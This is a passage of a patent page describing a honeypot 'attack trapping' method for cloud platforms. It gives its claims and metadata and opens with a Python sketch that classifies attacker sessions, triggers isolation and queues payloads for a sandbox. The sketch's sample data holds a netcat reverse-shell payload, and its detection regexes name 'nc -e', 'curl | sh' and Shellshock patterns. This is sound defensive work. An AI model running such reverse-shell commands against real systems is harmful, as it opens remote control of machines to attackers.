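    {"src": "10.20.0.11", "decoy": "10.20.0.4", "port": 80,
     "payload": b"#!/bin/sh\nnc -e /bin/sh 10.20.0.11 4444\n"},
]

# Constructed inventory from the cloud management system.
INVENTORY = {
    "10.20.0.10": {"vm": "web-01", "hypervisor": "node-a", "switch_port": "Gi1/0/3"},
    "10.20.0.11": {"vm": "build-02", "hypervisor": "node-b", "switch_port": "Gi1/0/7"},
}

# Constructed indicators; a real deployment would carry a far larger set.
SUSPICIOUS = [
    (re.compile(rb"/bin/(ba)?sh|\bnc\b.*-e|\bcurl\b.*\|\s*sh"), "command-execution"),
    (re.compile(rb"\(\)\s*\{\s*:;\s*\};"), "shellshock-pattern"),
]
EXECUTABLE_MAGIC = (b"MZ", b"\x7fELF", b"#!")


def locate(src, inventory=INVENTORY):
    """Position of the attacker inside the cloud platform, or None if unknown."""
    return inventory.get(src)


def classify(sessions):
    """Per source: observed attack stages, targets touched and matched indicators."""
    by_src = defaultdict(list)
    for s in sessions:
        by_src[s["src"]].append(s)
    result = {}
    for src, recs in by_src.items():
        targets = {(r["decoy"], r["port"]) for r in recs}
        hits = [tag for r in recs for pat, tag in SUSPICIOUS if pat.search(r["payload"])]
        stages = []
        if len(targets) >= 3:              # breadth across decoys/ports: scanning
            stages.append("reconnaissance")
        if hits:                           # payload that tries to run something
            stages.append("exploitation")
        result[src] = {"stages": stages, "targets": sorted(targets),
                       "indicators": sorted(set(hits))}
    return result


def suspicious_artifacts(sessions):
    """Payloads that look like code: these go to the sandbox, not only the report."""
    return [{"sha256": hashlib.sha256(s["payload"]).hexdigest(), "size": len(s["payload"]),
             "src": s["src"], "decoy": s["decoy"]}
            for s in sessions if s["payload"].startswith(EXECUTABLE_MAGIC)]


def risk(stages, indicators, located):
    """Coarse degree of risk; thresholds are an assumption of the example."""
    score = 2 * ("exploitation" in stages) + ("reconnaissance" in stages) + len(indicators)
    if located:
        score += 1   # a foothold on an inventoried internal device is not background noise
    return "high" if score >= 4 else "medium" if score >= 2 else "low"


def analyze(sessions=SESSIONS, inventory=INVENTORY):
    """Data report, alarms with isolation actions, and the sandbox hand-off queue."""
    report, alarms = {}, []
    for src, info in classify(sessions).items():
        device = locate(src, inventory)
        level = risk(info["stages"], info["indicators"], device)
        report[src] = {**info, "device": device, "risk": level}
        if device and level != "low":
            alarms.append({"action": "isolate", "attacker": src, "device": device["vm"],
                           "hypervisor": device["hypervisor"],
                           "switch_port": device["switch_port"], "risk": level})
    return {"report": report, "alarms": alarms, "sandbox_queue": suspicious_artifacts(sessions)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(), indent=2, default=str))
```

The alarm carries the switch port as well as the VM name: when the management system cannot reach the VM (or the attacker has the hypervisor), isolation at the aggregation switch is the fallback the patent's "disconnect the network connection" implies.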
Further, in an embodiment, the suspicious data includes suspicious code; the sandbox receives the suspicious code sent by the persistent threat analysis system and executes it to determine the degree of harm of the suspicious code.
In one embodiment, the suspicious information is analyzed in the sandbox: when the suspicious information is suspicious code, the code is executed in the sandbox, the response of the sandbox after execution is observed, and an analysis result is obtained. From it one can judge whether the attacker is a highly harmful one, such as a trojan or virus, and determine the degree of harm of the attack behavior generated by the attacker. The analysis result is sent back to the persistent threat analysis system to generate a log or an alarm. The sandbox has to be isolated from the cloud platform and from the rest of the trapping network, since executing the code is precisely what may cause the harm being measured.
In the attack trapping method provided by this embodiment, the position of the attacker in the cloud platform device is determined in order to determine the target device corresponding to the attacker in the cloud platform device, and the target device is then isolated. When the host attacked by the attacker is a fictitious host, the trapping network system directs the attacker to itself, lures the attacker into attacking it, obtains the attacker's address information and from it the attacker's position in the cloud platform device, so that the trapping network system captures the attacker hidden in the cloud platform device and isolates the target device in which the attacker resides from the other cloud platform devices. Attackers originating from devices inside the cloud platform, and network attacks launched from inside the cloud platform, can thus be stopped, which solves the technical problem that existing cloud platform network security solutions have difficulty discovering and stopping network attacks launched from devices inside the cloud platform.
In addition, an embodiment of the present invention further provides an attack trapping device, where the attack trapping device includes:
a determining module, configured to determine address information in the aggregation switch;
a configuration module, configured to determine, based on address information in the aggregation switch, idle target address information in the address information, and configure the target address information as address information of a fictitious host, where the fictitious host belongs to the trapping network system;
and a trapping module, configured to, when an attacker in the cloud platform device attacks the fictitious host based on the target address information, direct the attack behavior generated by the attacker to the trapping network system and trap the attacker.
Further, the trapping module is further configured to:
determine the position of the attacker in the cloud platform device so as to determine the target device corresponding to the attacker in the cloud platform device;
isolate the target device.
Further, the trapping module is further configured to:
when an attacker in the cloud platform device attacks the fictitious host based on the target address information, direct the attack behavior generated by the attacker to an application simulation system in the trapping network system, so that the attacker attacks the application simulation system and the application simulation system collects the attack data generated while the attacker attacks it.
Further, the trapping module is further configured to:
receive the attack data sent by the application simulation system, analyze the attack data, and generate a data report corresponding to the attack data so as to record the relevant attack information of the attacker.
Further, the trapping module is further configured to:
receive the attack data sent by the application simulation system, analyze the attack data, generate alarm information, and output the alarm information.
Further, the trapping module is further configured to:
analyze the attack data and, if suspicious data is detected in the attack data, send the suspicious data to a sandbox of the trapping network system so that the sandbox can analyze the suspicious data.
Further, the trapping module is further configured to:
receive the suspicious code sent by the persistent threat analysis system and execute the suspicious code to determine the degree of harm of the suspicious code.
Furthermore, an embodiment of the present invention further provides a computer-readable storage medium, on which an attack trapping program is stored, where the attack trapping program, when executed by a processor, implements the steps of the attack trapping method according to any one of the above.
The specific embodiment of the computer-readable storage medium of the present invention is substantially the same as the embodiments of the attack trapping method described above, and will not be described in detail herein.
It should be noted that, in this document, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or system that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or system. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other like elements in a process, method, article, or system that comprises the element.
The above-mentioned serial numbers of the embodiments of the present invention are merely for description and do not represent the merits of the embodiments.
Through the above description of the embodiments, those skilled in the art will clearly understand that the method of the above embodiments can be implemented by software plus a necessary general hardware platform, and certainly can also be implemented by hardware, but in many cases, the former is a better implementation manner. Based on such understanding, the technical solution of the present invention may be embodied in the form of a software product, which is stored in a storage medium (e.g., ROM/RAM, magnetic disk, optical disk) as described above and includes instructions for enabling a terminal device (e.g., a computer, a server, or a network device) to execute the method according to the embodiments of the present invention.
The above description is only a preferred embodiment of the present invention, and not intended to limit the scope of the present invention, and all modifications of equivalent structures and equivalent processes, which are made by using the contents of the present specification and the accompanying drawings, or directly or indirectly applied to other related technical fields, are included in the scope of the present invention.

Claims (10)

1. An attack trapping method, applied to a trapping network system that accesses a cloud platform device through an aggregation switch, the attack trapping method comprising the following steps:
determining address information in the aggregation switch;
determining idle target address information in the address information based on the address information in the aggregation switch, and configuring the target address information into address information of a fictitious host, wherein the fictitious host belongs to the trapping network system;
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to the trapping network system to trap the attacker.
2. The attack trapping method according to claim 1, wherein after the step of directing the attack behavior generated by the attacker to the trapping network system to trap the attacker when an attacker in the cloud platform device attacks the fictitious host based on the target address information, the method further comprises:
determining the position of the attacker in the cloud platform equipment so as to determine target equipment corresponding to the attacker in the cloud platform equipment;
isolating the target device.
3. The attack trapping method according to claim 1, wherein the step of directing attack behavior by an attacker to the trapping network system when the attacker in the cloud platform device attacks the fictitious host based on the target address information comprises:
when an attacker in the cloud platform equipment attacks the fictitious host based on the target address information, the attack behavior generated by the attacker is directed to an application simulation system in the trapping network system so that the attacker attacks the application simulation system, and the application simulation system collects attack data generated when the attacker attacks the application simulation system.
4. An attack trapping method according to claim 3, wherein the persistent threat analysis system of the trapping network system receives the attack data sent by the application simulation system, analyzes the attack data, and generates a data report corresponding to the attack data to record the relevant attack information of the attacker.
5. An attack trapping method according to claim 3, wherein a persistent threat analysis system of said trapping network system receives attack data sent by said application simulation system, analyzes said attack data, generates alarm information, and outputs said alarm information.
6. An attack trapping method according to claim 4 or 5, wherein the persistent threat analysis system analyzes the attack data, and if suspicious data is detected to exist in the attack data, the suspicious data is sent to a sandbox of the trapping network system for the sandbox to analyze the suspicious data.
7. An attack trapping method according to claim 6, wherein the suspicious data comprises suspicious code, the sandbox receives the suspicious code sent by the persistent threat analysis system and executes the suspicious code to determine the degree of harm of the suspicious code.
8. An attack trapping device, characterized in that it comprises:
a determining module, configured to determine address information in the aggregation switch;
a configuration module, configured to determine, based on address information in the aggregation switch, idle target address information in the address information, and configure the target address information as address information of a fictitious host, where the fictitious host belongs to the trapping network system;
and a trapping module, configured to, when an attacker in the cloud platform device attacks the fictitious host based on the target address information, direct the attack behavior generated by the attacker to the trapping network system and trap the attacker.
9. An attack trapping device, characterized in that it comprises: memory, a processor and an attack trapping program stored on the memory and executable on the processor, the attack trapping program when executed by the processor implementing the steps of the attack trapping method according to any one of claims 1 to 7.
10. A computer-readable storage medium, characterized in that the computer-readable storage medium has stored thereon an attack trapping program which, when executed by a processor, implements the steps of the attack trapping method according to any one of claims 1 to 7.

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202010336360.4A CN111541701B (en) 2020-04-24 2020-04-24 Attack trapping method, device, equipment and computer readable storage medium

Publications (2)

Publication Number Publication Date
CN111541701A true CN111541701A (en) 2020-08-14
CN111541701B CN111541701B (en) 2022-07-12

Family

ID=71975818

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202010336360.4A Active CN111541701B (en) 2020-04-24 2020-04-24 Attack trapping method, device, equipment and computer readable storage medium

Country Status (1)

Country Link
CN (1) CN111541701B (en)

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113965409A (en) * 2021-11-15 2022-01-21 北京天融信网络安全技术有限公司 Network trapping method and device, electronic equipment and storage medium
CN114266047A (en) * 2021-12-14 2022-04-01 北京天融信网络安全技术有限公司 Malicious program defense method and device, electronic equipment and storage medium

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN103139184A (en) * 2011-12-02 2013-06-05 中国电信股份有限公司 Intelligent network firewall device and network attack protection method
CN103581104A (en) * 2012-07-18 2014-02-12 江苏中科慧创信息安全技术有限公司 Active trapping method based on behavior capturing
US20170331858A1 (en) * 2016-05-10 2017-11-16 Quadrant Information Security Method, system, and apparatus to identify and study advanced threat tactics, techniques and procedures

Non-Patent Citations (2)

* Cited by examiner, † Cited by third party
Title
Tang Wen (汤雯): "Research on a network security early-warning and supervision platform based on trapping technology" (基于诱捕技术的网络安全预警监管平台研究), Cyberspace Security (网络空间安全) *
Wang Yao et al. (王瑶等): "Research and implementation of traceback technology based on honeytokens and honeypots" (基于蜜标和蜜罐的追踪溯源技术研究与实现), Information Technology (信息技术) *

Also Published As

Publication number Publication date
CN111541701B (en) 2022-07-12

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant